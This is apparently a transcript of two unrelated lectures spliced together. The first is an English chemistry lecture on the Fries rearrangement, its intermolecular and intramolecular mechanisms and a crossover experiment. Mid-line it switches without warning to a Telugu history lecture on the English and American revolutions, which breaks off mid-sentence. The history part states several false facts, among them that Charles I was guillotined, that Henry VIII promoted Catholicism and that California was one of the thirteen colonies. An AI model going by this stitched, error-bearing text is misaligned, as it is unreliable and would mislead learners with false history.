will undergo the fragmentation to form the acyl cation. This is the acyl cation. That means in the two-step mechanism, that is intermolecular mechanism, we will obtain an isolated acyl cation, and this acyl cation can be stabilized by the resonance. Here, instead of methyl group, phenyl group may also be present. Then is also known as acylium ion. In the second step, once the acyl cation is formed, we know that this is an electrophile. Therefore, this acyl cation, being an electrophile, can undergo electrophilic aromatic substitution reaction with this particular compound. And this acyl cation can undergo electrophilic aromatic substitution at the ortho position or at the para position. If it attacks the ortho position, we obtain the ortho isomer. We get the para isomer when it attacks the para position. In the second step, as I already explained, this acylium cation will attack the ortho position, and it is important to note that this particular group is a ortho para director. That means this particular group which is attached to the aromatic system will dictate the incoming electrophile to either the ortho position or the para position, because this is having the plus R effect. Once the acylium ion occupies the ortho position, we will get this particular compound. To retain aromaticity, the hydrogen will be removed as H+, then we will get this particular product, and this on hydrolysis we will obtain this particular ortho isomer, that means orthohydroxy acetophenone. Therefore, if you take phenyl acetate and carry out the Fries rearrangement with the Lewis acid catalyst AlCl3, we will obtain two isomers. One is orthohydroxy acetophenone and second one is para-hydroxy acetophenone. In the same way, if this particular acylium cation attacks the para position, then we can obtain the para-hydroxy acetophenone. Now let us look at the second mechanism which is proposed for the Fries rearrangement, that is the intramolecular mechanism. In the intramolecular mechanism, we won't get the intramolecular mechanism, we won't obtain the isolated acylium ion. This is a one-step process. Therefore, we won't get the acylium ion as isolated ion. Instead, once this particular complex is formed, then the acylium ion will attack the ortho position. Then we will obtain this particular orthohydroxy acetophenone. Therefore, the basic difference between the two-step mechanism, that is intermolecular mechanism, and the one-step mechanism, that is intramolecular mechanism, is in a two-step process or two-step mechanism, we obtain a isolated acylium ion, and this acylium ion can attack the benzene ring at the ortho position or para position. Another important point to remember is, in the intramolecular mechanism also we can obtain the para product. Therefore, we have to carry out a crossover experiment to find out which mechanism is correct, whether the Fries rearrangement follows the two-step mechanism, that is intermolecular mechanism, or one-step mechanism, that is intramolecular mechanism. Therefore, what we will do is, in this crossover experiment, instead of taking one phenyl ester, we will take a mixture of two phenyl esters and we will carry out the Fries rearrangement. If you take only this particular phenyl ester, then we will obtain this particular ketone, that is orthohydroxy ketone. And if you take this second different phenyl ester, then we will obtain this particular ketone. And for this particular Fries, that means this particular phenyl ester will undergo Fries rearrangement in the presence of the catalyst AlCl3 to form this ketone, and the second phenyl ester will undergo Fries rearrangement to form this particular ketone. And for this rearrangement reaction, the acylium ion formed will be this, and this for this rearrangement reaction, the acylium ion is this one. Therefore, if you take one
and carry out the Fries rearrangement, then we will obtain this product. If you take 2, carry out the reaction, we will obtain 4. Now what we will do is, instead of taking 1 and 2 separately and carrying out the Fries rearrangement, we will take the mixture of 1 and 2 and carry out the Fries rearrangement using AlCl3. When you take the mixture of 1 and 2 and carry out the Fries rearrangement, it was observed that instead of, in addition to the 3 and 4, we are getting 2 other products labeled as 5 and 6. 5 and 6, and 5 and 6 are only formed, these are known as cross products, and they are formed only when we follow the 2-step mechanism. In the 2-step mechanism, we are having the isolated acylium ions. Therefore, these acylium cations can undergo attack not only on the first compound but also on the second carbon. Therefore, what is happening is, this acylium cation which is obtained from the first compound is not attacking not only the aromatic ring of the first compound but also aromatic ring of the second compound. In the same way, the acylium ion which is obtained from the second phenyl ester is attacking not only this phenyl ester but also the phenyl ester labeled as 1. Therefore, instead of getting 2 ketones, we are getting 4 ketones. 2 are the normal expected products and 2 other products are known as cross products. Therefore, this is only possible when the mechanism is a 2-step process. Thank you. విప్లవాల యుగం. ఈరోజు మనము ఐరోపాలోను అమెరికాలో జరిగినటువంటి విప్లవాలను గురించి తెలుసుకుందాం. విప్లవాలు అనగానే మనకేమర్థమవుతుందంటే, రక్తపాతం ద్వారా సమాజాన్ని మార్చడం కానీ, లేదా ఒక సంఘంలో మార్పు తీసుకురావడం కానీ, లేదా రాజ్యంలో అధికారం కోల్పోవడం కానీ, ఇవన్నీ కూడా గమనిస్తాం. విప్లవం అనగా ఒక గొప్ప మార్పు అని అర్థం. ఈ మార్పు ప్రజా సంక్షేమానికి లేదా ఆ రోజునటువంటి ప్రజలకు అనుకూలంగా వచ్చే ప్రభుత్వాలు రావడానికి మూల కారణాలు విప్లవాల వల్లనే మనకు వచ్చాయనేది మనం చరిత్రలో మనం చదువుకుంటాం. ఈరోజు మనం చదవబోయే 3 అంశాలు: 1 ఆంగ్ల విప్లవము, 2 అమెరికా విప్లవము, 3 ఫ్రెంచ్ విప్లవము. ఆంగ్ల విప్లవము మనం తెలుసుకున్నట్లయితే, ఆంగ్ల విప్లవం ప్రపంచంలో మొట్టమొదటిసారిగా పార్లమెంటరీ విధానానికి రూపకల్పన చేసిన విప్లవము ఆంగ్ల విప్లవం. ఆంగ్ల దేశం అనగానే ఇంగ్లాండ్ అని, మనం గ్రేట్ బ్రిటన్ అని లేదా యూకే అని చెప్పేసి మనం పిలుస్తూ ఉంటాం. ఇంగ్లాండ్ మనకు తెలుసు, చాలా సుపరిచితం. భారతదేశాన్ని పరిపాలించినటువంటి ఇంగ్లాండ్ దేశం మనకు అందరికీ తెలిసిన విషయమే. ఇంగ్లాండ్లో మనం చూసినట్లయితే, ఇంగ్లాండ్ దేశాన్ని ట్యూడర్లు, స్టూవర్ట్లు వరుసగా పరిపాలించారు. అయితే ఇంగ్లాండ్ అనే దేశం ముందుగా ట్యూడర్ల పరిపాలనా కాలంలో చాలా అభివృద్ధి చెందింది. ట్యూడర్లలో 7వ హెన్రీ అనేవాడు గొప్ప ఇంగ్లాండ్ దేశానికి రూపకల్పన చేశాడు. ఇంగ్లాండ్ అనేవాడు రోజా పుష్ప యుద్ధాల్లో గెలిచి ఆ తర్వాత దేశాన్ని ప్రధానంగా ఒక రాజవంశం పరిపాలించడానికి కారణమైన వాడు 7వ హెన్రీ. 7వ హెన్రీ తర్వాత అధికారంలోకి వచ్చిన 8వ హెన్రీ. 8వ హెన్రీ కాలంలో ప్రధానంగా న్యాయ వ్యవస్థను పటిష్టపరచడం కానివ్వండి, లేదా క్యాథలిక్ మతాన్ని గొప్పగా దాన్ని అభివృద్ధి చేయడం కానివ్వండి, 8వ హెన్రీ చేయడం జరిగింది. 8వ హెన్రీ తర్వాత మనకు వరుసగా మేరీ, అలాగే ఎలిజబెత్ అనే వాళ్ళు పరిపాలించారు. మనకందరికీ తెలుసు, ఎలిజబెత్ పరిపాలనా కాలాన్ని ఇంగ్లాండ్లో సువర్ణయుగము లేదా స్వర్ణయుగం అని చెప్పేసి మనం పిలుచుకుంటున్నాం. ఎలిజబెత్ పరిపాలన అంతమైన తర్వాత ఇంగ్లాండ్ దేశాన్ని స్టూవర్టులు అనేవాళ్ళు పరిపాలించారు. స్టూవర్టులు కాలంలోనే మనకు ఇంగ్లాండ్ విప్లవము లేదా దివ్య విప్లవము లేదా మహావిప్లవము లేదా రక్తపాత రహిత విప్లవం అని పేర్లు కలిగిన విప్లవము మనం అందరికీ కూడా చెప్పుకోవచ్చు. సరే, ఈ ఆంగ్ల విప్లవం ఏంటిది? ఇది రక్తరహిత విప్లవము ఏంటిది? ఇది ఒక రక్తపు బొట్టు చెందకుండానే అక్కడ విప్లవం సక్సెస్ అయింది, విజయవంతమైపోయి పార్లమెంటరీ విధానానికి దారితీసిన మహావిప్లవమే ఆంగ్ల విప్లవం.
ఆంగ్ల దేశాన్ని మనం చూసినట్లయితే మొదటి జేమ్స్ కాలం నుండి పరిశీలించినట్లయితే మొదటి జేమ్స్ నియంతృత్వ పోకడను అవలంబించాడు. ఇతడు ఏమన్నాడంటే, నేను దేవుని యొక్క ప్రతినిధి, డివైన్ రైట్ కింగ్షిప్ థియరీ, దైవదత్తాధికార సిద్ధాంతాన్ని ప్రచారం చేశాడు. నేను దేవుని యొక్క ప్రతినిధి కాబట్టి నన్ను ప్రశ్నించే వీలు లేదని చెప్పేసి ఈయన ప్రజలకు చెప్పడం జరిగింది. ఏకస్వామ్య హక్కులను, ఏకస్వామ్య వ్యాపార హక్కులను విక్రయిస్తూ పార్లమెంటుకు అనుమతి లేకుండానే ఇతడు అనేక నిర్ణయాలు చేయడం జరిగింది. మొదటి జేమ్స్ తర్వాత అధికారంలోకి వచ్చినటువంటి మొదటి చార్లెస్ కూడా పార్లమెంటు అనుమతి లేకుండా ఇతడు అనేక పన్నులు కూడా విధించడం జరిగింది. అయితే మొదటి చార్లెస్ కాలంలో తన విశ్వాసపాత్రుడైన డ్యూక్ ఆఫ్ బకింగ్హోమ్ అనే వాని పట్ల ప్రజల్లో ప్రధానంగా పార్లమెంటరీ సభ్యుల్లో కూడా అతని పట్ల విముఖత ఉంది. ఆయన పైన అవినీతి ఆరోపణలు ఉన్నాయి. డ్యూక్ ఆఫ్ బకింగ్హోమ్ను తొలగించాలని ప్రజలు కోరారు. పార్లమెంటరీ కూడా చాలామంది సభ్యులు కోరడం జరిగింది. అయితే మొదటి చార్లెస్ పార్లమెంటు మాట వినకుండా పార్లమెంటును రద్దు చేశాడు. రెండవ పార్లమెంటును కూడా ఏర్పాటు చేశాడు. రెండవ పార్లమెంటు కూడా డ్యూక్ ఆఫ్ బకింగ్హోమ్ను విమర్శించడంతో దాన్ని రద్దు చేశాడు. చివరికి మూడవ పార్లమెంటును కూడా రద్దు చేసి దాన్ని సమావేశపరిచి దాన్ని కూడా రద్దు చేయడం జరిగింది. సరే, చివరికి నాలుగవ పార్లమెంటును ఇతడు సమావేశపరిచాడు. దీనికి ప్రధాన కారణం ఏంటంటే స్కాట్లాండ్లో వచ్చినటువంటి ప్రెస్బిటేరియన్ల తిరుగుబాటు. ప్రధానంగా అక్కడ ప్రొటెస్టెంట్ మతస్థులు ఆ తిరుగుబాటును ప్రేరేపించడంతో వారిని అణిచివేయడానికి డబ్బులు కావాల్సి వచ్చాయి. అందుకే మొదటి చార్లెస్ పార్లమెంటు అనుమతి ద్వారా ప్రజలపై పన్నులు విధించాలని భావించాడు. దీనితో పార్లమెంటు సమావేశమైంది. అయితే ఇంతకుముందు 1629 నుండి 1640 వరకు 11 సంవత్సరాలు పార్లమెంటు సమావేశం కాకుండానే ఇంగ్లాండ్ దేశాన్ని పరిపాలించిన వాడు మొదటి చార్లెస్. అలాగే 1640 నుండి 1660 వరకు పార్లమెంటు సుదీర్ఘంగా సమావేశమైంది. అందుకే దీన్ని ఏమంటామంటే ఇంగ్లాండ్ చరిత్రలో లాంగ్ పార్లమెంట్. 1640 నుండి 1660 వరకు లాంగ్ పార్లమెంటుగా ప్రసిద్ధిగా ఎక్కింది. సరే, పార్లమెంటు సమావేశపరిచిన తర్వాత మొదటి చార్లెస్కు వ్యతిరేకమైన ఒక గ్రూపు, ప్రధానంగా ఆలివర్ క్రామ్వెల్ అనేవాడు. ఆలివర్ క్రామ్వెల్ ఏం చేశాడంటే ప్యూరిటన్ విప్లవానికి కారకుడయ్యాడు. ఇంగ్లాండ్లో ఉండే ప్రొటెస్టెంట్లను ప్యూరిటన్లు అంటారు. ప్యూరిటన్లు ఏంటంటే వీళ్ళు క్యాథలిక్ మతానికి కొంచెం విరుద్ధంగా ఉండడము లేదా క్యాథలిక్ సాంప్రదాయాలను పాటించకుండా వర్గాన్ని ప్యూరిటన్లు అని చెప్పేసి మనం చెప్పుకోవచ్చు. మనకు మార్టిన్ లూథర్ అనేవాడు ప్రొటెస్టెంట్ ఉద్యమాన్ని ప్రారంభించాడు. ఆ ఉద్యమంలో భాగంగానే ఇంగ్లాండ్, అమెరికాలో ఉండే క్రైస్తవ లేదా క్యాథలిక్ మతాన్ని ప్రొటెస్టెంట్ మతాన్ని అనుసరించే వారిని ప్యూరిటన్లు అని చెప్పేసి అంటాం. సరే, ఈ ప్యూరిటన్ విప్లవానికి కారకుడు ఆలివర్ క్రామ్వెల్ మొదటి చార్లెస్కి వ్యతిరేకంగా పార్లమెంటులో ప్రవేశించి మొదటి చార్లెస్ను విమర్శించాడు. దీనితో మొదటి చార్లెస్ ఆలివర్ క్రామ్వెల్ను అరెస్ట్ చేయడానికి పూనుకున్నాడు. అయితే ఆలివర్ క్రామ్వెల్ తన పార్లమెంటరీ సభ్యుల మద్దతుతోనూ ప్రజల మద్దతుతోనూ మొదటి చార్లెస్ను బంధించి అతన్ని ఉరితీయడానికి ప్రేరేపించాడు. దీనితో ఇంగ్లాండ్ చరిత్రలో మొట్టమొదటిసారిగా ప్యూరిటన్ విప్లవం సక్సెస్ అయ్యి చార్లెస్ I ఉరితీయబడ్డాడు. జనవరి 30, 1649లో అతడు గిలోటిన్ లేదా ఉరితీయడం అని చెప్పేసి మనం చెప్పుకుంటాము. తల నరికేసి ఆ మొదటి చార్లెస్ను ప్రధానంగా అతని పరిపాలన అంతం చేయడం అనేది మనం చూస్తాము. దీని కారకుడు ఆలివర్ క్రామ్వెల్. సరే, ఆలివర్ క్రామ్వెల్ పరిపాలన తర్వాత వరుసగా రెండవ చార్లెస్ అధికారంలోకి వచ్చాడు. రెండవ చార్లెస్ తర్వాత రెండవ జేమ్స్ అనేవాడు కూడా అధికారంలోకి వచ్చాడు. సరే, రెండవ జేమ్స్ పరిపాలనా కాలంలో ప్రధానంగా ఆంగ్ల విప్లవం కొనసాగింది. రెండవ జేమ్స్ ఎలాగైతే మొదటి జేమ్స్ దైవదత్తాధికార సిద్ధాంతాన్ని దాని అనుగుణంగా పరిపాలించాడో తాను కూడా అదే బాటలో పరిపాలించాలని చెప్పేసి భావించిన వాడు రెండవ జేమ్స్. ఇతడు క్యాథలిక్ మతాన్ని రుద్దాలని చెప్పేసి అలాగే తనకు విశ్వాసపాత్రులైన వారిని ప్రధానంగా క్యాథలిక్ మతాన్ని అనుసరించే వాళ్ళని మాత్రమే ఇంగ్లాండ్లో ప్రధానంగా అనేక కొలువుల్లో నియమించాడు. దీనితో ప్రజలు రెండవ జేమ్స్ను వ్యతిరేకించడం ప్రారంభించారు. రెండవ జేమ్స్ దీన్ని పట్టించుకోకుండా ఇంగ్లాండ్ దేశంలో నియంతృత్వ పరిపాలన కొనసాగించడానికి పూనుకోవడంతో ఇంగ్లాండ్లో విప్లవం రావడానికి కారణమైంది. సరే, రెండవ జేమ్స్ ప్రధానంగా ఇంతకుముందు ఉన్నటువంటి మొదటి చార్లెస్ ఆమోదించినటువంటి హక్కుల చట్టంపై కానీ లేదా ఇంకా కొన్ని చట్టాలకు అనుకూలంగా లేడు. అందుకే రెండవ జేమ్స్ని వ్యతిరేకించినటువంటి పార్లమెంటు సభ్యులు
ఇంగ్లాండ్లో ప్రధానంగా కామన్స్ సభ దీన్ని వ్యతిరేకించి, ఇంగ్లాండ్లో ఉండే పార్లమెంటును మనం 2 సభలుగా పిలుచుకోవచ్చు. ఒకటి కామన్స్ సభ, మొదటిది లార్డ్స్ సభ. లార్డ్స్ సభ పెద్దల సభ, రెండవది కామన్స్ సభ. కామన్స్ సభలో ఉండే అత్యధిక మంది 2వ జేమ్స్ను వ్యతిరేకించడంతో విప్లవం ప్రారంభమైంది. అయితే 2వ జేమ్స్ కామన్ సభను అణిచివేయడానికి సైన్యాన్ని రప్పించాడు. ఇది గమనించిన కామన్స్ సభ సభ్యులు వెంటనే ఇతని అల్లుడైన విలియం, అప్పుడు హాలండ్ పరిపాలకుడు విలియం అనేవాడు, తన కూతురు మేరీని విలియంకిచ్చి పెళ్లి చేశాడు. విలియం మరియు మేరీలను కామన్స్ సభ సభ్యులు ఆహ్వానించారు ఇంగ్లాండ్ దేశానికి. మీరు వచ్చేసి ఇంగ్లాండ్ సింహాసాన్ని అధిష్ఠించండి, 2వ జేమ్స్ నియంతృత్వ పరిపాలన కొనసాగిస్తున్నాడు, క్యాథలిక్ మతాన్ని ప్రజలపైన రుద్దుతున్నాడు, తన విశ్వాసపాత్రులైన వారిని మాత్రమే ఉద్యోగాలు నియమిస్తున్నాడని చెప్పేసి చెప్పడంతో విలియం మరియు మేరీలు హాలండ్ దేశం నుండి ఇంగ్లాండ్కు రావడం జరిగింది. 1688లో విలియం అండ్ మేరీలు ఇంగ్లాండ్కు వచ్చి సింహాసనాన్ని అధిష్ఠించారు. ఇది గమనించిన 2వ జేమ్స్ ఎవరికి చెప్పకుండానే పలాయనం చిత్తగించాడు, ఫ్రాన్స్ దేశానికి పారిపోయాడు. నిజంగా ఒక దేశ చరిత్రలో ఒక రక్తపు బొట్టు కూడా చిందకుండా ఒక దేశం యొక్క రాజు దేశాన్ని విడిచి పారిపోవడం అనేది మనం ఇంగ్లాండ్ దేశ చరిత్రలో చూస్తాం. 1688లో పారిపోయిన 2వ జేమ్స్ అక్కడే ఫ్రాన్స్ దేశంలోనే 1701లో అక్కడే ప్రవాస జీవితం గడిపి మరణించాడు. సరే, ఈ మొదటిసారిగా వచ్చినటువంటి ఇంగ్లాండ్లో వచ్చిన ఈ రక్తపాత రహిత విప్లవం ప్రధానంగా ప్రపంచం పైన గొప్ప ప్రభావాన్ని కనబరిచింది. ఎందుకని అంతదాకా ప్రపంచ దేశాల్లో దైవదత్తాధికార సిద్ధాంతం అంటే రాజు దైవస్వరూపుడు లేదా దేవుని యొక్క ప్రతినిధి అని ఒక నమ్మే సిద్ధాంతం మనం ఐరోపాలోనూ మనం చూస్తాము, అలాగే ఆసియా ఖండాల్లో కూడా అక్కడక్కడ మనం చూస్తాం ఇక్కడ. అయితే దీనికి విరుద్ధంగా పార్లమెంటే అన్నిటికంటే హక్కులు కలిగి ఉంది, పార్లమెంటరీ వ్యవస్థనే ఉండాలని ఒక వ్యవస్థను గొప్ప రూపకల్పన చేసిన విప్లవము మనకు 1688 ఇంగ్లాండ్ విప్లవం. ఇంగ్లాండ్ విప్లవం సక్సెస్ కాగలిగింది. విలియం అండ్ మేరీలు వీళ్ళు ఏం చేశారంటే 1689లో ఒక చట్టం పైన సంతకం చేశారు. ఈ హక్కుల చట్టము, దీన్ని హక్కుల చట్టం అంటాం. ఈ హక్కుల చట్టం ఏంటంటే పార్లమెంటుకే అన్ని అధికారాలను అప్పజెప్పారు, పార్లమెంటరీ అనుమతి లేకుండా ఏ చట్టం చేయడానికి వీలు లేదు. ఇది నిజంగా ప్రపంచ దేశాలలోనే ఒక గొప్ప సంఘటన. ఇటువంటి సంఘటన ఇంతకు ముందెప్పుడు జరగలేదు. అందుకే దీన్ని మ్యాగ్నా కార్టా ఆఫ్ ఇంగ్లాండ్ అని కూడా మనం పిలుచుకుంటారు, హక్కుల చట్టాన్ని. ఈ హక్కుల చట్టమే కాకుండా తర్వాత 1701లో యాక్ట్ ఆఫ్ సెటిల్మెంట్ ద్వారా ఇంగ్లాండ్ సింహాసనాన్ని కూడా ఎవరు వారసత్వంగా ఉండాలో నిర్ణయించే హక్కు కూడా పార్లమెంటుకి దక్కింది. నిజంగా ఈ రెండు కూడా గొప్ప చారిత్రాత్మకమైన చట్టాలు. 1689 హక్కుల చట్టము, 1701 యాక్ట్ ఆఫ్ సెటిల్మెంట్. దీని ద్వారా పార్లమెంటరీ అధికారం నిరూపించబడింది. దీనితో పార్లమెంటుకి అధికారాలన్నీ దక్కాయి. దీనితో అందుకేమంటామంటే మనకు ఇంగ్లాండ్ పార్లమెంటులు మాతగా పిలుచుకుంటారు. పార్లమెంట్ ఈజ్ నథింగ్ బట్ ది ఆల్ పార్లమెంట్స్ ఆఫ్ ది వరల్డ్ అని చెప్పేసి పేరుగాంచిన ఇంగ్లాండ్ పార్లమెంటు, దీని ద్వారానే మనకు అధికారంలోకి వచ్చింది ఇంగ్లాండ్ విప్లవం. అలాగే పార్లమెంటులో ప్రధానంగా ఎగువ సభ లార్డ్స్ సభ. ఇంతకుముందు లార్డ్స్ సభకు ఎక్కువ అధికారాలు ఉండేవి, పెత్తనం అదే చలాయించేది. కానీ ఈరోజు ఏమైందంటే లార్డ్స్ సభ అధికారాన్ని కోల్పోయి సామాన్యుల సభ అధికారంలోకి వచ్చింది. సామాన్యుల సభ ఈరోజు ఇప్పటి నుండి ఇక ఏ విషయంలోనైనా సరే అధికారాన్ని చలాయించడానికి లేదా ఎటువంటి పన్నులు విధించడానికి కూడా 2వ సభకు ప్రధానంగా అధికారం రావడం మేము చూస్తాము. మన భారతదేశంలో కూడా రాజ్యసభ ఎగువ సభగాను, లోకసభ దిగువ సభగాను మనం చూస్తాము. లోకసభకి ఎక్కువ అధికారాలు ఇక్కడ మనం గమనిస్తాము. అలాగే ఇంగ్లాండ్ దేశంలో కూడా దిగువ సభ అయిన కామన్స్ సభకి అధికారాలన్నీ దక్కాయి. 1688 రక్తరహిత విప్లవము లేదా దివ్య విప్లవము, మహావిప్లవం అని చెప్పేసి మనం పేర్కొంటాము. ఇది ఒక రక్తబొట్టు చిందకుండానే విజయవంతమైన విప్లవము ఇంగ్లాండ్ విప్లవము.
రెండవ విప్లవము అమెరికా విప్లవం. ఇది ప్రధానంగా అమెరికా ఖండంలో జరిగిన విప్లవం. ఈ అమెరికా ఖండంలో ప్రధానంగా మనం గమనించినట్లయితే అమెరికా అనే దేశం మనకు 1492 వరకు మనకు అమెరికా ఖండంలో కనిపించదు. క్రిస్టఫర్ కొలంబస్ అనేవాడు 1492లో అమెరికాను కనుగొన్నాడు. అమెరిగో వెస్టూచి అనేవాడు ఈ క్రిస్టఫర్ కొలంబస్ కనుగొన్న అమెరికాను పరిశోధించడంతో అతని పేరు మీదుగానే అమెరికా అనే పేరు వచ్చింది. సరే, ఈ అమెరికాలో ప్రధానంగా అనేక రాజ్యాలు వలసలు స్థాపించుకున్నాయి. కెనడా కానీ, ఫ్రాన్స్ కానీ, స్పెయిన్ కానీ, ఇంగ్లాండ్ కానీ, డచ్ కానీ, ఇలా అనేక దేశాలు అమెరికాలో వలసలు ఏర్పాటు చేయడానికి ఉత్సాహాన్ని ప్రదర్శించాయి. అయితే మనకు 1607, 1733 నాటికి అమెరికాలో ప్రధానంగా 13 వలసలు ఏర్పడ్డాయి. అందులో 1607 ఏర్పడిన జేమ్స్ టౌన్ కానీ, అంతకంటే ముందు ఏర్పడిన వర్జీనియా కానీ, న్యూ హ్యాంప్షైర్, న్యూ కరోలినా, సౌత్ కరోలినా, అలాగే కాలిఫోర్నియా, జార్జియా, న్యూయార్క్, ఇలాంటి అనేక వలసలు అమెరికా దేశంలో ఏర్పడ్డాయి. ఈ అమెరికా దేశానికి ఎందుకు వచ్చారు చాలామంది ప్రజలు అన్నప్పుడు, ఇంగ్లాండ్లో ప్రధానంగా ఇంగ్లాండ్ రాజులు అనుసరించిన క్యాథలిక్ మత విధానం మూలంగా ఇంగ్లాండ్లో ఉండే అనేక మంది ప్యూరిటన్లు మే ఫ్లవర్ అనే నౌకలో 1620లో వాళ్ళు మత స్వేచ్ఛ కోసం అమెరికాకు వచ్చారు. కాబట్టి మనకు ఇంగ్లాండ్ నుండే కాక అనేక దేశాల నుంచి కూడా మత స్వేచ్ఛ కోసం లేదా ప్రశాంత జీవన కోసం అమెరికా దేశానికి వచ్చిన వారు అనేక మంది విదేశీయులు ఇక్కడే స్థిరపడ్డారు. అయితే చివరికి అక్కడ అమెరికా ఖండంలో లేదా అమెరికా అనే దేశంలో 13 వలసలు ఏర్పడ్డాయి. ఈ 13 వలసలపైన ఇంగ్లాండ్ దేశానికే అధికారం కలిగింది. అయితే ఇంగ్లాండ్ తన దేశ ప్రజల పట్ల కూడా ప్రధానంగా వాణిజ్య విధానాన్ని అనుసరించింది. వాణిజ్య విధానం అనగా ఏంటంటే, వలస దేశాలు తమ మాతృదేశ ప్రయోజనాల కోసమే పనిచేయాలి, మాతృదేశాల యొక్క సరుకులనే కొనాలి, అలాగే తమ దేశంలో ఉత్పత్తి అయ్యే ముడి పదార్థాలను కేవలం మాతృదేశానికే ఎగుమతి చేయాలనే అంశమే వాణిజ్యవాదం. ఈ వాణిజ్యవాదాన్ని ఇంగ్లాండ్ దేశం తన ప్రజల పట్ల కూడా ప్రయోగించింది. తన ప్రజలంటే ఇంగ్లాండ్లో ఉండే ప్రజలు అమెరికాలో కూడా ఉన్నారు. అమెరికన్ ప్రజలు ఎక్కువ మంది ఇంగ్లాండ్ దేశానికే చెందినవారు. అయితే ఇంగ్లాండ్ ఏం చేసిందంటే అమెరికా దేశంలో అనేక రకాలైన పన్నులను విధించింది. 1764 పంచదార చట్టము, 1765 స్టాంపుల చట్టము, 1766 క్వార్టరింగ్ చట్టము, 1766 డిక్లరేటరీ చట్టం, 1764 పంచదార చట్టము. అమెరికన్ ప్రజలు అందరికీ తెలుసు, అందరూ టీ తాగే అలవాటు అనేక దేశాలు ఉంది, అమెరికా కూడా ఉంది. అయితే అమెరికాలో దిగుమతి చేసుకునే ఈ పంచదార పైన పన్నులు అధికంగా విధించారు ఇంగ్లాండ్ దేశం వాళ్ళు. అలాగే 65లో వచ్చిన స్టాంపుల చట్టం, భూముల రిజిస్ట్రేషన్ కానివ్వండి, వీటికి సంబంధించిన స్టాంపులను అధిక ధరలకు విక్రయించడం అనేది అమెరికాలో మనం చూడవచ్చు. అలాగే 66లో వచ్చిన క్వార్టరింగ్ చట్టం. క్వార్టరింగ్ చట్టం అంటే అమెరికాలో ఉండే ఇంగ్లాండ్ సైనికులు లేదా ఇంగ్లాండ్ యొక్క అధికారులు వారి యొక్క నివాస వసతి, వారి జీతభత్యాలన్నీ కూడా అమెరికా దేశ ప్రజలే భరించాలి అనేదే క్వార్టరింగ్ చట్టం. అలాగే 1766లో డిక్లరేటరీ చట్టం. అంటే అమెరికా వాసులు వ్యతిరేకిస్తున్నారు, పన్నులు విధించడానికి వ్యతిరేకిస్తున్నారు. దీన్ని ఆధారంగా చేసుకొని ఏం చేశారంటే ఇంగ్లాండ్ వాళ్లకు అధికారం ఉంది, అమెరికా దేశం పైన పన్నులు విధించే అధికారం ఇంగ్లాండ్ దేశానికి ఉంది, మేము మాతృదేశం వాళ్ళమని ఇంగ్లాండ్ వాళ్ళు ఈ డిక్లరేటరీ చట్టం ద్వారా ప్రకటించుకున్నారు. అంటే అమెరికా పైన పన్నులు విధించే అధికారము ఎల్లప్పుడూ ఇంగ్లాండ్ దేశానికి ఉంటుంది. కానీ ఈ చట్టాలను వ్యతిరేకిస్తూ అమెరికన్ ప్రజలు అనేక పోరాటాలు చేశారు. ప్రధానంగా స్టాంపుల వ్యతిరేక ఉద్యమాన్ని ప్రారంభించారు. 1765లో న్యూయార్క్లో స్టాంపుల వ్యతిరేక మహాసభ జరిగింది. ఈ స్టాంపుల వ్యతిరేక మహాసభలో స్టాంపుల చట్టానే కాకుండా అన్ని చట్టాలను కూడా రద్దు చేయాలని చెప్పేసి ప్రజలకు పిలుపునిచ్చారు. ప్రధానంగా ఆ దేశంలో చాలామంది మహానాయకులు జేమ్స్ ఓటిస్ కానీ, థామస్ జెఫర్సన్ కానీ, థామస్ పెయిన్ లాంటి వాళ్ళు గొప్ప గొప్ప నిదానాలు ఇచ్చారు. ఉదాహరణకు జేమ్స్ ఓటిస్ అనేవాడు ట్యాక్సేషన్ వితౌట్ రిప్రజెంటేషన్ ఈజ్ టిరనీ, అంటే ప్రాతినిధ్యం లేకుండా పన్నులు విధించడం నియంతృత్వం అని చెప్పేసి పేర్కొన్నవాడు జేమ్స్ ఓటిస్. అంటే ప్రాతినిధ్యం లేదు ప్రజలకు,
ఇంగ్లాండ్ దేశం ఉండే పార్లమెంట్లో అమెరికన్స్కు ప్రాతినిధ్యం లేదు, తాను తాము పరిపాలించే హక్కు లేదు. అందుకే అన్నారు, మాకు శాసనసభలో ప్రాతినిధ్యం లేకుండా మేము పన్నులు కట్టేది లేదని చెప్పేసి స్టాంపుల చట్టానికి వ్యతిరేకంగా న్యూయార్క్లో వాళ్ళు నిలదించారు. అట్లాగే థామస్ పెయిన్ అనే గొప్ప రచయిత ఒక గొప్ప కరపత్రాన్ని ప్రచురించాడు. అదేంటంటే కామన్ సెన్స్ అని. కామన్ సెన్స్ అనగా ఏంటంటే ఇంగిత జ్ఞానము. నిజంగా ఈ కరపత్రం చాలా చిన్నదైనా మొత్తం అమెరికా ఖండాన్నే ప్రభావితం చేసినటువంటి ఒక కరపత్రము కామన్ సెన్స్ అనేది. దీంట్లో ఏం చెప్పాడంటే, ఒక ద్వీపము ఒక ఖండాన్ని పరిపాలించాలనుకోవడం నిజంగా ఎంత అవివేకము అన్నాడు. నిజంగా మనం ఆలోచించినట్లయితే ఇంగ్లాండ్ దేశం ఎంత చిన్నది, అంత చిన్న దేశం ఒక ఖండాన్ని పరిపాలించాలనుకోవడం అన్యాయం మరియు అవివేకం అని చెప్పేసి థామస్ పెయిన్ అనేవాడు ఈ కరపత్రాన్ని ప్రచురించాడు. ఇది 13 వలసల్లో కూడా ప్రధానంగా విప్లవ భావాలను రేకెత్తించినటువంటి పాంప్లెట్ ఏదంటే ఇదే కామన్ సెన్స్ అనేది. అట్లాగే ఏంటంటే ప్రజలందరూ కూడా దేవుని చేత సమానంగా సృజించబడ్డారు, అందుకే వాళ్ళందరికీ కూడా సమాన హక్కులు కల్పించాలనే ఒక భావన కూడా మనకు ప్రధానంగా అమెరికా విప్లవంలో మనకు కల్పిస్తుంది. కానీ ఈ విధంగా ఎప్పుడైతే ఉద్యమం వచ్చిందో ఇంగ్లాండ్ వాళ్ళు ఏం చేశారంటే స్టాంపుల చట్టాన్ని రద్దు చేశారు, ఇంకా పంచదార చట్టాన్ని రద్దు చేశారు. అయితే ఇన్ని చేసినా కూడా ప్రధానంగా లాస్ట్కి ఏమన్నారంటే, లేదు స్టాంపుల చట్టం కాదు, ఇవి కాదు, ప్రధానంగా మాకు పన్నులు వేసే అధికారం మాకే ఉందని చెప్పేసి చివరికి ఒక్క దాని మీద మాత్రం తీసివేయలేదు, అదే తేయాకు పైన మాత్రం పన్ను తీసివేయలేదు. అప్పుడు జార్జ్ గ్రెన్వెల్ అనేవాడు వచ్చాడు, ఆ తర్వాత మంత్రిగా ఉన్నాడు జార్జ్ గ్రెన్వెల్. ఆ 